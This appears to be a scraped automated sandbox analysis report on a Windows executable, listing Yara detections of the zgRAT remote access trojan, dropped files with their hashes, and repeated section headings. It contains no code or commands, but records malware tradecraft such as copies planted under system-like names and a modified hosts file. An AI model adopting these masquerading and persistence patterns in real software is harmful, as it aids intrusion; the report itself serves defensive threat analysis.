Source: Yara match	File source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Windows Analysis Report
C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

ID:	1431496
Product:	CloudBasic
Start time:	10:31:07
Start date:	25.04.2024
Sample:	C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	6acbb1fb58dccd74db667187b22de689
SHA1:	cf0df5b247b15157cfce47473d1b063705d10b44
SHA256:	c792057cb761da8872421a6c906c4481b260bdb5d27b86378efdd2af39319687
Filetype:	Win64 Executable GUI (202006/5) 92.65%

Name	Type	MD5	SHA1	SHA256
C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe	data	E58F54961290891BA8DD349131192542	E95EE8B62C8ED496FCC87CF0BAE3290392A4196E	9B129787A354C2400B13F6A3ADC4B22BB4EFE21B88E1A04E7E5DC6D093E421A8
C:\PerfDll\hyperProviderSavesinto.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3997D7D058AF3C1B6C9ABB57F6FA1F2A	CD38C3EB67E2D09445EB39B66A69B31673C2360C	B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
C:\PerfDll\vvkzdvmSUM14jiAzc.bat	ASCII text, with CRLF line terminators	B23A11797069052E51F71DDF9BCFC4F2	08C3C1D85CB102A92843C2ED82CCCDD8CA26026D	E026F1D8CED262BF0921EBC7BBC797AA65F3E6E2AD8A62B9F4566CC4AA540A43
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3997D7D058AF3C1B6C9ABB57F6FA1F2A	CD38C3EB67E2D09445EB39B66A69B31673C2360C	B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\e3a74901549792	ASCII text, with very long lines (372), with no line terminators	2FBD38F1B2C42F8FDA17DE88950BAEEA	16420569F041ADAF0A8A666EE5F02E71E9115B78	5AD54B6BAB2D4B20373FC46B8447FDDCE47D0C0DD51B24340054E7CCDD511B1E
C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	PE32+ executable (GUI) x86-64, for MS Windows	7A568EF3F46D369F3D3FFD68FDF68573	203042A80812E2208C45AA95900172550994D80D	BB895B0D8E684A48F0E9564B9D7E1323087D4F4664DA134A28A54338BFAB4EA0
C:\Recovery\24dbde2999530e	ASCII text, with very long lines (614), with no line terminators	19CBF5DB2E33EA2352F8D7F174EC29FA	77DF3CEE51970122409E18B22D78CA9D67DA7697	F718A294F9B10D4F09ACE961A311CFFE5C6CEF5A68E293EA938ECC3664484143
C:\Recovery\9e8d7a4ca61bd9	ASCII text, with very long lines (553), with no line terminators	4521F42FB8C267F3E475D816413D0BD2	B1D346E3CF33D84960E119706D5C6E28BF84F243	B135560624CB2C1A7AB33D3B630F7D4E988880DD09353FEDADD3627A05F29B27
C:\Recovery\RuntimeBroker.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3997D7D058AF3C1B6C9ABB57F6FA1F2A	CD38C3EB67E2D09445EB39B66A69B31673C2360C	B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
C:\Recovery\WmiPrvSE.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3997D7D058AF3C1B6C9ABB57F6FA1F2A	CD38C3EB67E2D09445EB39B66A69B31673C2360C	B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KZcLqgnLvRf.exe.log	CSV text	9F9FA9EFE67E9BBD165432FA39813EEA	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperProviderSavesinto.exe.log	ASCII text, with CRLF line terminators	F3475F6FF1F713C7C9DAACC1DF623E58	AED39B5923CCC56514F33B73DF64A13706CE0DAE	3AE4E8E8ADBD758B6E39EA3D7B8E680F3160F6E5D48DAF1F0419236F1978CDCE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	BC6DB77EB243BF62DC31267706650173	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
C:\Users\user\AppData\Local\Temp\GargantuaN.exe	PE32 executable (GUI) Intel 80386, for MS Windows	B3CEE15E9FDDC0E7DC33069319B549D6	1FF4EF47BA8A0DE9F65EAA389B11D662AEC318DE	AF6A8E7175A702F8AF26ED414DD0FBF1708F7716EFB33792594149EF12D2431C
C:\Users\user\AppData\Local\Temp\GargantuanS.exe	PE32+ executable (GUI) x86-64, for MS Windows	7A568EF3F46D369F3D3FFD68FDF68573	203042A80812E2208C45AA95900172550994D80D	BB895B0D8E684A48F0E9564B9D7E1323087D4F4664DA134A28A54338BFAB4EA0
C:\Users\user\AppData\Local\Temp\Y3JYEDyczl	ASCII text, with no line terminators	383DFC1B708DABB1113ABA4A4E02C81E	4E1363C0CE2383964530043559CCEAEC6FD4DC18	CBA3C2487A99506E55707BA678F8045EDC328A215359E5EF813DAB3FAFC50ED6
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f54xiryt.5iz.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0wd3t4d.3q0.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnediovm.vle.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzrg2sk5.gbv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat	DOS batch file, ASCII text, with CRLF line terminators	44ED471A88CA3E3E404EE06B3FED43F4	BDC6A8090B3F507481B40A177B9BE34E98077927	891F19BF4B1FEF90065D1FB1B21502EEC493BBDE5C64492E559B49223F5E4263
C:\Users\user\Desktop\IkSFhrpY.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	D8BF2A0481C0A17A634D066A711C12E9	7CC01A58831ED109F85B64FE4920278CEDF3E38D	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
C:\Users\user\Desktop\KEMGRwnV.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	E9CE850DB4350471A62CC24ACB83E859	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
C:\Users\user\Desktop\LugVktua.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	F4B38D0F95B7E844DD288B441EBC9AAF	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
C:\Users\user\Desktop\WiKMUFpI.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	E9CE850DB4350471A62CC24ACB83E859	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
C:\Users\user\Desktop\XVmuemSr.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	2D6975FD1CC3774916D8FF75C449EE7B	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
C:\Users\user\Desktop\kEwbgeKe.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	2D6975FD1CC3774916D8FF75C449EE7B	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
C:\Users\user\Desktop\msAjSsFc.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	D8BF2A0481C0A17A634D066A711C12E9	7CC01A58831ED109F85B64FE4920278CEDF3E38D	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
C:\Users\user\Desktop\phOzxInG.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	1DCDE09C6A8CE8F5179FB24D0C5A740D	1A2298CB4E9CAB6F5C2894266F42D7912EDD294B	1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
C:\Users\user\Desktop\vsaRQqFM.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	1DCDE09C6A8CE8F5179FB24D0C5A740D	1A2298CB4E9CAB6F5C2894266F42D7912EDD294B	1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
C:\Users\user\Desktop\zQhPhksn.log	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	F4B38D0F95B7E844DD288B441EBC9AAF	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3997D7D058AF3C1B6C9ABB57F6FA1F2A	CD38C3EB67E2D09445EB39B66A69B31673C2360C	B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
C:\Windows\Provisioning\Packages\e3a74901549792	ASCII text, with very long lines (334), with no line terminators	52111B51DEC339C6A76B6C866EEC54ED	37A6D21D02CB10DDEB0D8EECF0CDB7B412263BE8	3CC1B3F788ABA7C13DEB30F164133F585498EC50AE18A26AF48AEC0182ADA352
C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3997D7D058AF3C1B6C9ABB57F6FA1F2A	CD38C3EB67E2D09445EB39B66A69B31673C2360C	B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
C:\Windows\RemotePackages\RemoteDesktops\e3a74901549792	ASCII text, with no line terminators	5622E54B9BD142AC3E2AE55196C4AB89	74D044F079CFD00840F92F61436916B5B53F97C8	03C12437E85E88EED0820FA7636842EC900FEA8D1D576CE8703F7C6D24F4CE4B
C:\Windows\System32\drivers\etc\hosts	ASCII text, with CRLF line terminators	4B81122BEC5C7F1650C47159338C9BA3	EA50B1416C0288E27CA41390D7A2DD85D099DD50	D919FD0377FBCB23402D089C48BA3132B6115F7E1E57E0588ABFBAF1562A170D
\Device\Null	ASCII text, with CRLF line terminators	01E42C7D0BFC330C8CB8F87BD1F25257	EAD7E45750E84C22F8BB01AF7D3BF6CB81401F8F	A634384A405C46CD9DB3F596A3F5A032AC51B1B7634BC8FFB9D016CDBCF74CD4

Windows Analysis Report C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Malware Threat Intel
Provided by